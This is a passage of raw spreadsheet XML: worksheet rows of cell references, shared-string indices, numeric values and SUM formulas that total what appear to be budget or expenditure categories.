      <c r="B1127" s="10"/>
      <c r="C1127" s="28"/>
      <c r="D1127" s="10" t="s">
        <v>5840</v>
      </c>
      <c r="E1127" s="16" t="s">
        <v>3859</v>
      </c>
      <c r="F1127" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1128" spans="1:6">
      <c r="A1128" s="10"/>
      <c r="B1128" s="10"/>
      <c r="C1128" s="28"/>
      <c r="D1128" s="10" t="s">
        <v>5841</v>
      </c>
      <c r="E1128" s="16" t="s">
        <v>3860</v>
      </c>
      <c r="F1128" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1129" spans="1:6">
      <c r="A1129" s="10"/>
      <c r="B1129" s="10"/>
      <c r="C1129" s="28"/>
      <c r="D1129" s="10" t="s">
        <v>5842</v>
      </c>
      <c r="E1129" s="16" t="s">
        <v>3861</v>
      </c>
      <c r="F1129" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1130" spans="1:6">
      <c r="A1130" s="10"/>
      <c r="B1130" s="10"/>
      <c r="C1130" s="28"/>
      <c r="D1130" s="10" t="s">
        <v>5843</v>
      </c>
      <c r="E1130" s="16" t="s">
        <v>3862</v>
      </c>
      <c r="F1130" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1131" spans="1:6">
      <c r="A1131" s="10"/>
      <c r="B1131" s="10"/>
      <c r="C1131" s="28"/>
      <c r="D1131" s="10" t="s">
        <v>5844</v>
      </c>
      <c r="E1131" s="16" t="s">
        <v>3863</v>
      </c>
      <c r="F1131" s="17">
        <v>48</v>
      </c>
    </row>
    <row r="1132" spans="1:6">
      <c r="A1132" s="10"/>
      <c r="B1132" s="10"/>
      <c r="C1132" s="28"/>
      <c r="D1132" s="10" t="s">
        <v>5845</v>
      </c>
      <c r="E1132" s="11" t="s">
        <v>3864</v>
      </c>
      <c r="F1132" s="12">
        <f>SUM(F1133:F1134)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1133" spans="1:6">
      <c r="A1133" s="10"/>
      <c r="B1133" s="10"/>
      <c r="C1133" s="28"/>
      <c r="D1133" s="10" t="s">
        <v>5846</v>
      </c>
      <c r="E1133" s="16" t="s">
        <v>3865</v>
      </c>
      <c r="F1133" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1134" spans="1:6">
      <c r="A1134" s="10"/>
      <c r="B1134" s="10"/>
      <c r="C1134" s="28"/>
      <c r="D1134" s="10" t="s">
        <v>5847</v>
      </c>
      <c r="E1134" s="16" t="s">
        <v>3866</v>
      </c>
      <c r="F1134" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1135" spans="1:6">
      <c r="A1135" s="10"/>
      <c r="B1135" s="10"/>
      <c r="C1135" s="28"/>
      <c r="D1135" s="10" t="s">
        <v>5848</v>
      </c>
      <c r="E1135" s="11" t="s">
        <v>3867</v>
      </c>
      <c r="F1135" s="12">
        <f>F1136+F1137</f>
        <v>35</v>
      </c>
    </row>
    <row r="1136" spans="1:6">
      <c r="A1136" s="10"/>
      <c r="B1136" s="10"/>
      <c r="C1136" s="28"/>
      <c r="D1136" s="10" t="s">
        <v>5849</v>
      </c>
      <c r="E1136" s="16" t="s">
        <v>3868</v>
      </c>
      <c r="F1136" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1137" spans="1:6">
      <c r="A1137" s="10"/>
      <c r="B1137" s="10"/>
      <c r="C1137" s="28"/>
      <c r="D1137" s="10" t="s">
        <v>5850</v>
      </c>
      <c r="E1137" s="16" t="s">
        <v>3869</v>
      </c>
      <c r="F1137" s="17">
        <v>35</v>
      </c>
    </row>
    <row r="1138" spans="1:6">
      <c r="A1138" s="10"/>
      <c r="B1138" s="10"/>
      <c r="C1138" s="28"/>
      <c r="D1138" s="10" t="s">
        <v>5851</v>
      </c>
      <c r="E1138" s="11" t="s">
        <v>3870</v>
      </c>
      <c r="F1138" s="12">
        <f>SUM(F1139:F1147)</f>
        <v>932</v>
      </c>
    </row>
    <row r="1139" spans="1:6">
      <c r="A1139" s="10"/>
      <c r="B1139" s="10"/>
      <c r="C1139" s="28"/>
      <c r="D1139" s="10" t="s">
        <v>5852</v>
      </c>
      <c r="E1139" s="11" t="s">
        <v>3871</v>
      </c>
      <c r="F1139" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1140" spans="1:6">
      <c r="A1140" s="10"/>
      <c r="B1140" s="10"/>
      <c r="C1140" s="31"/>
      <c r="D1140" s="10" t="s">
        <v>5853</v>
      </c>
      <c r="E1140" s="11" t="s">
        <v>3872</v>
      </c>
      <c r="F1140" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1141" spans="1:6">
      <c r="A1141" s="10"/>
      <c r="B1141" s="10"/>
      <c r="C1141" s="28"/>
      <c r="D1141" s="10" t="s">
        <v>5854</v>
      </c>
      <c r="E1141" s="11" t="s">
        <v>3873</v>
      </c>
      <c r="F1141" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1142" spans="1:6">
      <c r="A1142" s="10"/>
      <c r="B1142" s="10"/>
      <c r="C1142" s="28"/>
      <c r="D1142" s="10" t="s">
        <v>5855</v>
      </c>
      <c r="E1142" s="11" t="s">
        <v>3874</v>
      </c>
      <c r="F1142" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1143" spans="1:6">
      <c r="A1143" s="10"/>
      <c r="B1143" s="10"/>
      <c r="C1143" s="28"/>
      <c r="D1143" s="10" t="s">
        <v>5856</v>
      </c>
      <c r="E1143" s="11" t="s">
        <v>3875</v>
      </c>
      <c r="F1143" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1144" spans="1:6">
      <c r="A1144" s="10"/>
      <c r="B1144" s="10"/>
      <c r="C1144" s="28"/>
      <c r="D1144" s="10" t="s">
        <v>5857</v>
      </c>
      <c r="E1144" s="11" t="s">
        <v>3876</v>
      </c>
      <c r="F1144" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1145" spans="1:6">
      <c r="A1145" s="10"/>
      <c r="B1145" s="10"/>
      <c r="C1145" s="28"/>
      <c r="D1145" s="10" t="s">
        <v>5858</v>
      </c>
      <c r="E1145" s="11" t="s">
        <v>3877</v>
      </c>
      <c r="F1145" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1146" spans="1:6">
      <c r="A1146" s="10"/>
      <c r="B1146" s="10"/>
      <c r="C1146" s="28"/>
      <c r="D1146" s="10" t="s">
        <v>5859</v>
      </c>
      <c r="E1146" s="11" t="s">
        <v>3878</v>
      </c>
      <c r="F1146" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1147" spans="1:6">
      <c r="A1147" s="10"/>
      <c r="B1147" s="10"/>
      <c r="C1147" s="28"/>
      <c r="D1147" s="10" t="s">
        <v>5860</v>
      </c>
      <c r="E1147" s="11" t="s">
        <v>3879</v>
      </c>
      <c r="F1147" s="17">
        <v>932</v>
      </c>
    </row>
    <row r="1148" spans="1:6">
      <c r="A1148" s="10"/>
      <c r="B1148" s="10"/>
      <c r="C1148" s="28"/>
      <c r="D1148" s="10" t="s">
        <v>5861</v>
      </c>
      <c r="E1148" s="11" t="s">
        <v>3880</v>
      </c>
      <c r="F1148" s="12">
        <f>F1149+F1176+F1191</f>
        <v>5323</v>
      </c>
    </row>
    <row r="1149" spans="1:6">
      <c r="A1149" s="10"/>
      <c r="B1149" s="10"/>
      <c r="C1149" s="28"/>
      <c r="D1149" s="10" t="s">
        <v>5862</v>
      </c>
      <c r="E1149" s="11" t="s">
        <v>3881</v>
      </c>
      <c r="F1149" s="12">
        <f>SUM(F1150:F1175)</f>
        <v>5115</v>
      </c>
    </row>
    <row r="1150" spans="1:6">
      <c r="A1150" s="10"/>
      <c r="B1150" s="10"/>
      <c r="C1150" s="28"/>
      <c r="D1150" s="10" t="s">
        <v>5863</v>
      </c>
      <c r="E1150" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F1150" s="17">
        <v>4471</v>
      </c>
    </row>
    <row r="1151" spans="1:6">
      <c r="A1151" s="10"/>
      <c r="B1151" s="10"/>
      <c r="C1151" s="28"/>
      <c r="D1151" s="10" t="s">
        <v>5864</v>
      </c>
      <c r="E1151" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F1151" s="17">
        <v>18</v>
      </c>
    </row>
    <row r="1152" spans="1:6">
      <c r="A1152" s="10"/>
      <c r="B1152" s="10"/>
      <c r="C1152" s="28"/>
      <c r="D1152" s="10" t="s">
        <v>5865</v>
      </c>
      <c r="E1152" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F1152" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1153" spans="1:6">
      <c r="A1153" s="10"/>
      <c r="B1153" s="10"/>
      <c r="C1153" s="28"/>
      <c r="D1153" s="10" t="s">
        <v>5866</v>
      </c>
      <c r="E1153" s="16" t="s">
        <v>3882</v>
      </c>
      <c r="F1153" s="17">
        <v>150</v>
      </c>
    </row>
    <row r="1154" spans="1:6">
      <c r="A1154" s="10"/>
      <c r="B1154" s="10"/>
      <c r="C1154" s="28"/>
      <c r="D1154" s="10" t="s">
        <v>5867</v>
      </c>
      <c r="E1154" s="16" t="s">
        <v>3883</v>
      </c>
      <c r="F1154" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1155" spans="1:6">
      <c r="A1155" s="10"/>
      <c r="B1155" s="10"/>
      <c r="C1155" s="28"/>
      <c r="D1155" s="10" t="s">
        <v>5868</v>
      </c>
      <c r="E1155" s="16" t="s">
        <v>3884</v>
      </c>
      <c r="F1155" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1156" spans="1:6">
      <c r="A1156" s="10"/>
      <c r="B1156" s="10"/>
      <c r="C1156" s="28"/>
      <c r="D1156" s="10" t="s">
        <v>5869</v>
      </c>
      <c r="E1156" s="16" t="s">
        <v>3885</v>
      </c>
      <c r="F1156" s="17">
        <v>8</v>
      </c>
    </row>
    <row r="1157" spans="1:6">
      <c r="A1157" s="10"/>
      <c r="B1157" s="10"/>
      <c r="C1157" s="28"/>
      <c r="D1157" s="10" t="s">
        <v>5870</v>
      </c>
      <c r="E1157" s="16" t="s">
        <v>3886</v>
      </c>
      <c r="F1157" s="17">
        <v>244</v>
      </c>
    </row>
    <row r="1158" spans="1:6">
      <c r="A1158" s="10"/>
      <c r="B1158" s="10"/>
      <c r="C1158" s="28"/>
      <c r="D1158" s="10" t="s">
        <v>5871</v>
      </c>
      <c r="E1158" s="16" t="s">
        <v>3887</v>
      </c>
      <c r="F1158" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1159" spans="1:6">
      <c r="A1159" s="10"/>
      <c r="B1159" s="10"/>
      <c r="C1159" s="28"/>
      <c r="D1159" s="10" t="s">
        <v>5872</v>
      </c>
      <c r="E1159" s="16" t="s">
        <v>3888</v>
      </c>
      <c r="F1159" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1160" spans="1:6">
      <c r="A1160" s="10"/>
      <c r="B1160" s="10"/>
      <c r="C1160" s="28"/>
      <c r="D1160" s="10" t="s">
        <v>5873</v>
      </c>
      <c r="E1160" s="16" t="s">
        <v>3889</v>
      </c>
      <c r="F1160" s="17">
        <v>130</v>
      </c>
    </row>
    <row r="1161" spans="1:6">
      <c r="A1161" s="10"/>
      <c r="B1161" s="10"/>
      <c r="C1161" s="28"/>
      <c r="D1161" s="10" t="s">
        <v>5874</v>
      </c>
      <c r="E1161" s="16" t="s">
        <v>3890</v>
      </c>
      <c r="F1161" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1162" spans="1:6">
      <c r="A1162" s="10"/>
      <c r="B1162" s="10"/>
      <c r="C1162" s="28"/>
      <c r="D1162" s="10" t="s">
        <v>5875</v>
      </c>
      <c r="E1162" s="16" t="s">
        <v>3891</v>
      </c>
      <c r="F1162" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1163" spans="1:6">
      <c r="A1163" s="10"/>
      <c r="B1163" s="10"/>
      <c r="C1163" s="28"/>
      <c r="D1163" s="10" t="s">
        <v>5876</v>
      </c>
      <c r="E1163" s="16" t="s">
        <v>3892</v>
      </c>
      <c r="F1163" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1164" spans="1:6">
      <c r="A1164" s="10"/>
      <c r="B1164" s="10"/>
      <c r="C1164" s="28"/>
      <c r="D1164" s="10" t="s">
        <v>5877</v>
      </c>
      <c r="E1164" s="16" t="s">
        <v>3893</v>
      </c>
      <c r="F1164" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1165" spans="1:6">
      <c r="A1165" s="10"/>
      <c r="B1165" s="10"/>
      <c r="C1165" s="28"/>
      <c r="D1165" s="10" t="s">
        <v>5878</v>
      </c>
      <c r="E1165" s="16" t="s">
        <v>3894</v>
      </c>
      <c r="F1165" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1166" spans="1:6">
      <c r="A1166" s="10"/>
      <c r="B1166" s="10"/>
      <c r="C1166" s="28"/>
      <c r="D1166" s="10" t="s">
        <v>5879</v>
      </c>
      <c r="E1166" s="16" t="s">
        <v>3895</v>
      </c>
      <c r="F1166" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1167" spans="1:6">
      <c r="A1167" s="10"/>
      <c r="B1167" s="10"/>
      <c r="C1167" s="28"/>
      <c r="D1167" s="10" t="s">
        <v>5880</v>
      </c>
      <c r="E1167" s="16" t="s">
        <v>3896</v>
      </c>
      <c r="F1167" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1168" spans="1:6">
      <c r="A1168" s="10"/>
      <c r="B1168" s="10"/>
      <c r="C1168" s="28"/>
      <c r="D1168" s="10" t="s">
        <v>5881</v>
      </c>
      <c r="E1168" s="16" t="s">
        <v>3897</v>
      </c>
      <c r="F1168" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1169" spans="1:6">
      <c r="A1169" s="10"/>
      <c r="B1169" s="10"/>
      <c r="C1169" s="28"/>
      <c r="D1169" s="10" t="s">
        <v>5882</v>
      </c>
      <c r="E1169" s="16" t="s">
        <v>3898</v>
      </c>
      <c r="F1169" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1170" spans="1:6">
      <c r="A1170" s="10"/>
      <c r="B1170" s="10"/>
      <c r="C1170" s="28"/>
      <c r="D1170" s="10" t="s">
        <v>5883</v>
      </c>
      <c r="E1170" s="16" t="s">
        <v>3899</v>
      </c>
      <c r="F1170" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1171" spans="1:6">
      <c r="A1171" s="10"/>
      <c r="B1171" s="10"/>
      <c r="C1171" s="28"/>
      <c r="D1171" s="10" t="s">
        <v>5884</v>
      </c>
      <c r="E1171" s="16" t="s">
        <v>3900</v>
      </c>
      <c r="F1171" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1172" spans="1:6">
      <c r="A1172" s="10"/>
      <c r="B1172" s="10"/>
      <c r="C1172" s="28"/>
      <c r="D1172" s="10" t="s">
        <v>5885</v>
      </c>
      <c r="E1172" s="16" t="s">
        <v>3901</v>
      </c>
      <c r="F1172" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1173" spans="1:6">
      <c r="A1173" s="10"/>
      <c r="B1173" s="10"/>
      <c r="C1173" s="28"/>
      <c r="D1173" s="10" t="s">
        <v>5886</v>
      </c>
      <c r="E1173" s="16" t="s">
        <v>3902</v>
      </c>
      <c r="F1173" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1174" spans="1:6">
      <c r="A1174" s="10"/>
      <c r="B1174" s="10"/>
      <c r="C1174" s="28"/>
      <c r="D1174" s="10" t="s">
        <v>5887</v>
      </c>
      <c r="E1174" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F1174" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1175" spans="1:6">
      <c r="A1175" s="10"/>
      <c r="B1175" s="10"/>
      <c r="C1175" s="28"/>
      <c r="D1175" s="10" t="s">
        <v>5888</v>
      </c>
      <c r="E1175" s="16" t="s">
        <v>3903</v>
      </c>
      <c r="F1175" s="17">
        <v>94</v>
      </c>
    </row>
    <row r="1176" spans="1:6">
      <c r="A1176" s="10"/>
      <c r="B1176" s="10"/>
      <c r="C1176" s="28"/>
      <c r="D1176" s="10" t="s">
        <v>5889</v>
      </c>
      <c r="E1176" s="11" t="s">
        <v>3904</v>
      </c>
      <c r="F1176" s="12">
        <f>SUM(F1177:F1190)</f>
        <v>208</v>
      </c>
    </row>
    <row r="1177" spans="1:6">
      <c r="A1177" s="10"/>
      <c r="B1177" s="10"/>
      <c r="C1177" s="28"/>
      <c r="D1177" s="10" t="s">
        <v>5890</v>
      </c>
      <c r="E1177" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F1177" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1178" spans="1:6">
      <c r="A1178" s="10"/>
      <c r="B1178" s="10"/>
      <c r="C1178" s="28"/>
      <c r="D1178" s="10" t="s">
        <v>5891</v>
      </c>
      <c r="E1178" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F1178" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1179" spans="1:6">
      <c r="A1179" s="10"/>
      <c r="B1179" s="10"/>
      <c r="C1179" s="28"/>
      <c r="D1179" s="10" t="s">
        <v>5892</v>
      </c>
      <c r="E1179" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F1179" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1180" spans="1:6">
      <c r="A1180" s="10"/>
      <c r="B1180" s="10"/>
      <c r="C1180" s="28"/>
      <c r="D1180" s="10" t="s">
        <v>5893</v>
      </c>
      <c r="E1180" s="16" t="s">
        <v>3905</v>
      </c>
      <c r="F1180" s="17">
        <v>31</v>
      </c>
    </row>
    <row r="1181" spans="1:6">
      <c r="A1181" s="10"/>
      <c r="B1181" s="10"/>
      <c r="C1181" s="28"/>
      <c r="D1181" s="10" t="s">
        <v>5894</v>
      </c>
      <c r="E1181" s="16" t="s">
        <v>3906</v>
      </c>
      <c r="F1181" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1182" spans="1:6">
      <c r="A1182" s="10"/>
      <c r="B1182" s="10"/>
      <c r="C1182" s="28"/>
      <c r="D1182" s="10" t="s">
        <v>5895</v>
      </c>
      <c r="E1182" s="16" t="s">
        <v>3907</v>
      </c>
      <c r="F1182" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1183" spans="1:6">
      <c r="A1183" s="10"/>
      <c r="B1183" s="10"/>
      <c r="C1183" s="28"/>
      <c r="D1183" s="10" t="s">
        <v>5896</v>
      </c>
      <c r="E1183" s="16" t="s">
        <v>3908</v>
      </c>
      <c r="F1183" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1184" spans="1:6">
      <c r="A1184" s="10"/>
      <c r="B1184" s="10"/>
      <c r="C1184" s="28"/>
      <c r="D1184" s="10" t="s">
        <v>5897</v>
      </c>
      <c r="E1184" s="16" t="s">
        <v>3909</v>
      </c>
      <c r="F1184" s="17">
        <v>177</v>
      </c>
    </row>
    <row r="1185" spans="1:6">
      <c r="A1185" s="10"/>
      <c r="B1185" s="10"/>
      <c r="C1185" s="28"/>
      <c r="D1185" s="10" t="s">
        <v>5898</v>
      </c>
      <c r="E1185" s="16" t="s">
        <v>3910</v>
      </c>
      <c r="F1185" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1186" spans="1:6">
      <c r="A1186" s="10"/>
      <c r="B1186" s="10"/>
      <c r="C1186" s="28"/>
      <c r="D1186" s="10" t="s">
        <v>5899</v>
      </c>
      <c r="E1186" s="16" t="s">
        <v>3911</v>
      </c>
      <c r="F1186" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1187" spans="1:6">
      <c r="A1187" s="10"/>
      <c r="B1187" s="10"/>
      <c r="C1187" s="28"/>
      <c r="D1187" s="10" t="s">
        <v>5900</v>
      </c>
      <c r="E1187" s="16" t="s">
        <v>3912</v>
      </c>
      <c r="F1187" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1188" spans="1:6">
      <c r="A1188" s="10"/>
      <c r="B1188" s="10"/>
      <c r="C1188" s="28"/>
      <c r="D1188" s="10" t="s">
        <v>5901</v>
      </c>
      <c r="E1188" s="16" t="s">
        <v>3913</v>
      </c>
      <c r="F1188" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1189" spans="1:6">
      <c r="A1189" s="10"/>
      <c r="B1189" s="10"/>
      <c r="C1189" s="28"/>
      <c r="D1189" s="10" t="s">
        <v>5902</v>
      </c>
      <c r="E1189" s="16" t="s">
        <v>3914</v>
      </c>
      <c r="F1189" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1190" spans="1:6">
      <c r="A1190" s="10"/>
      <c r="B1190" s="10"/>
      <c r="C1190" s="28"/>
      <c r="D1190" s="10" t="s">
        <v>5903</v>
      </c>
      <c r="E1190" s="16" t="s">
        <v>3915</v>
      </c>
      <c r="F1190" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1191" spans="1:6">
      <c r="A1191" s="10"/>
      <c r="B1191" s="10"/>
      <c r="C1191" s="28"/>
      <c r="D1191" s="10" t="s">
        <v>5904</v>
      </c>
      <c r="E1191" s="11" t="s">
        <v>3916</v>
      </c>
      <c r="F1191" s="12">
        <f>F1192</f>
        <v>0</v>
      </c>
    </row>
    <row r="1192" spans="1:6">
      <c r="A1192" s="10"/>
      <c r="B1192" s="10"/>
      <c r="C1192" s="28"/>
      <c r="D1192" s="10" t="s">
        <v>5905</v>
      </c>
      <c r="E1192" s="16" t="s">
        <v>3917</v>
      </c>
      <c r="F1192" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1193" spans="1:6">
      <c r="A1193" s="10"/>
      <c r="B1193" s="10"/>
      <c r="C1193" s="28"/>
      <c r="D1193" s="10" t="s">
        <v>5906</v>
      </c>
      <c r="E1193" s="11" t="s">
        <v>3918</v>
      </c>
      <c r="F1193" s="12">
        <f>SUM(F1194,F1205,F1209)</f>
        <v>25262</v>
      </c>
    </row>
    <row r="1194" spans="1:6">
      <c r="A1194" s="10"/>
      <c r="B1194" s="10"/>
      <c r="C1194" s="28"/>
      <c r="D1194" s="10" t="s">
        <v>5907</v>
      </c>
      <c r="E1194" s="11" t="s">
        <v>3919</v>
      </c>
      <c r="F1194" s="12">
        <f>SUM(F1195:F1204)</f>
        <v>12463</v>
      </c>
    </row>
    <row r="1195" spans="1:6">
      <c r="A1195" s="10"/>
      <c r="B1195" s="10"/>
      <c r="C1195" s="28"/>
      <c r="D1195" s="10" t="s">
        <v>5908</v>
      </c>
      <c r="E1195" s="16" t="s">
        <v>3920</v>
      </c>
      <c r="F1195" s="17">
        <v>175</v>
      </c>
    </row>
    <row r="1196" spans="1:6">
      <c r="A1196" s="10"/>
      <c r="B1196" s="10"/>
      <c r="C1196" s="28"/>
      <c r="D1196" s="10" t="s">
        <v>5909</v>
      </c>
      <c r="E1196" s="16" t="s">
        <v>3921</v>
      </c>
      <c r="F1196" s="17">
        <v>1083</v>
      </c>
    </row>
    <row r="1197" spans="1:6">
      <c r="A1197" s="10"/>
      <c r="B1197" s="10"/>
      <c r="C1197" s="28"/>
      <c r="D1197" s="10" t="s">
        <v>5910</v>
      </c>
      <c r="E1197" s="16" t="s">
        <v>3922</v>
      </c>
      <c r="F1197" s="17">
        <v>4391</v>
      </c>
    </row>
    <row r="1198" spans="1:6">
      <c r="A1198" s="10"/>
      <c r="B1198" s="10"/>
      <c r="C1198" s="28"/>
      <c r="D1198" s="10" t="s">
        <v>5911</v>
      </c>
      <c r="E1198" s="16" t="s">
        <v>3923</v>
      </c>
      <c r="F1198" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1199" spans="1:6">
      <c r="A1199" s="10"/>
      <c r="B1199" s="10"/>
      <c r="C1199" s="28"/>
      <c r="D1199" s="10" t="s">
        <v>5912</v>
      </c>
      <c r="E1199" s="16" t="s">
        <v>3924</v>
      </c>
      <c r="F1199" s="17">
        <v>3677</v>
      </c>
    </row>
    <row r="1200" spans="1:6">
      <c r="A1200" s="10"/>
      <c r="B1200" s="10"/>
      <c r="C1200" s="28"/>
      <c r="D1200" s="10" t="s">
        <v>5913</v>
      </c>
      <c r="E1200" s="16" t="s">
        <v>3925</v>
      </c>
      <c r="F1200" s="17">
        <v>899</v>
      </c>
    </row>
    <row r="1201" spans="1:6">
      <c r="A1201" s="10"/>
      <c r="B1201" s="10"/>
      <c r="C1201" s="28"/>
      <c r="D1201" s="10" t="s">
        <v>5914</v>
      </c>
      <c r="E1201" s="16" t="s">
        <v>3926</v>
      </c>
      <c r="F1201" s="17">
        <v>1035</v>
      </c>
    </row>
    <row r="1202" spans="1:6">
      <c r="A1202" s="10"/>
      <c r="B1202" s="10"/>
      <c r="C1202" s="28"/>
      <c r="D1202" s="10" t="s">
        <v>5915</v>
      </c>
      <c r="E1202" s="16" t="s">
        <v>3927</v>
      </c>
      <c r="F1202" s="17">
        <v>1203</v>
      </c>
    </row>
    <row r="1203" spans="1:6">
      <c r="A1203" s="10"/>
      <c r="B1203" s="10"/>
      <c r="C1203" s="28"/>
      <c r="D1203" s="10" t="s">
        <v>5916</v>
      </c>
      <c r="E1203" s="16" t="s">
        <v>3928</v>
      </c>
      <c r="F1203" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1204" spans="1:6">
      <c r="A1204" s="10"/>
      <c r="B1204" s="10"/>
      <c r="C1204" s="28"/>
      <c r="D1204" s="10" t="s">
        <v>5917</v>
      </c>
      <c r="E1204" s="16" t="s">
        <v>3929</v>
      </c>
      <c r="F1204" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1205" spans="1:6">
      <c r="A1205" s="10"/>
      <c r="B1205" s="10"/>
      <c r="C1205" s="28"/>
      <c r="D1205" s="10" t="s">
        <v>5918</v>
      </c>
      <c r="E1205" s="11" t="s">
        <v>3930</v>
      </c>
      <c r="F1205" s="12">
        <f>SUM(F1206:F1208)</f>
        <v>12799</v>
      </c>
    </row>
    <row r="1206" spans="1:6">
      <c r="A1206" s="10"/>
      <c r="B1206" s="10"/>
      <c r="C1206" s="28"/>
      <c r="D1206" s="10" t="s">
        <v>5919</v>
      </c>
      <c r="E1206" s="16" t="s">
        <v>3931</v>
      </c>
      <c r="F1206" s="17">
        <v>12799</v>
      </c>
    </row>
    <row r="1207" spans="1:6">
      <c r="A1207" s="10"/>
      <c r="B1207" s="10"/>
      <c r="C1207" s="28"/>
      <c r="D1207" s="10" t="s">
        <v>5920</v>
      </c>
      <c r="E1207" s="16" t="s">
        <v>3932</v>
      </c>
      <c r="F1207" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1208" spans="1:6">
      <c r="A1208" s="10"/>
      <c r="B1208" s="10"/>
      <c r="C1208" s="28"/>
      <c r="D1208" s="10" t="s">
        <v>5921</v>
      </c>
      <c r="E1208" s="16" t="s">
        <v>3933</v>
      </c>
      <c r="F1208" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1209" spans="1:6">
      <c r="A1209" s="10"/>
      <c r="B1209" s="10"/>
      <c r="C1209" s="28"/>
      <c r="D1209" s="10" t="s">
        <v>5922</v>
      </c>
      <c r="E1209" s="11" t="s">
        <v>3934</v>
      </c>
      <c r="F1209" s="12">
        <f>SUM(F1210:F1212)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1210" spans="1:6">
      <c r="A1210" s="10"/>
      <c r="B1210" s="10"/>
      <c r="C1210" s="28"/>
      <c r="D1210" s="10" t="s">
        <v>5923</v>
      </c>
      <c r="E1210" s="16" t="s">
        <v>3935</v>
      </c>
      <c r="F1210" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1211" spans="1:6">
      <c r="A1211" s="10"/>
      <c r="B1211" s="10"/>
      <c r="C1211" s="28"/>
      <c r="D1211" s="10" t="s">
        <v>5924</v>
      </c>
      <c r="E1211" s="16" t="s">
        <v>3936</v>
      </c>
      <c r="F1211" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1212" spans="1:6">
      <c r="A1212" s="10"/>
      <c r="B1212" s="10"/>
      <c r="C1212" s="28"/>
      <c r="D1212" s="10" t="s">
        <v>5925</v>
      </c>
      <c r="E1212" s="16" t="s">
        <v>3937</v>
      </c>
      <c r="F1212" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1213" spans="1:6">
      <c r="A1213" s="10"/>
      <c r="B1213" s="10"/>
      <c r="C1213" s="28"/>
      <c r="D1213" s="10" t="s">
        <v>5926</v>
      </c>
      <c r="E1213" s="11" t="s">
        <v>3938</v>
      </c>
      <c r="F1213" s="12">
        <f>F1214+F1232+F1238+F1244</f>
        <v>67</v>
      </c>
    </row>
    <row r="1214" spans="1:6">
      <c r="A1214" s="10"/>
      <c r="B1214" s="10"/>
      <c r="C1214" s="28"/>
      <c r="D1214" s="10" t="s">
        <v>5927</v>
      </c>
      <c r="E1214" s="11" t="s">
        <v>3939</v>
      </c>
      <c r="F1214" s="12">
        <f>SUM(F1215:F1231)</f>
        <v>9</v>
      </c>
    </row>
    <row r="1215" spans="1:6">
      <c r="A1215" s="10"/>
      <c r="B1215" s="10"/>
      <c r="C1215" s="28"/>
      <c r="D1215" s="10" t="s">
        <v>5928</v>
      </c>
      <c r="E1215" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F1215" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1216" spans="1:6">
      <c r="A1216" s="10"/>
      <c r="B1216" s="10"/>
      <c r="C1216" s="28"/>
      <c r="D1216" s="10" t="s">
        <v>5929</v>
      </c>
      <c r="E1216" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F1216" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1217" spans="1:6">
      <c r="A1217" s="10"/>
      <c r="B1217" s="10"/>
      <c r="C1217" s="28"/>
      <c r="D1217" s="10" t="s">
        <v>5930</v>
      </c>
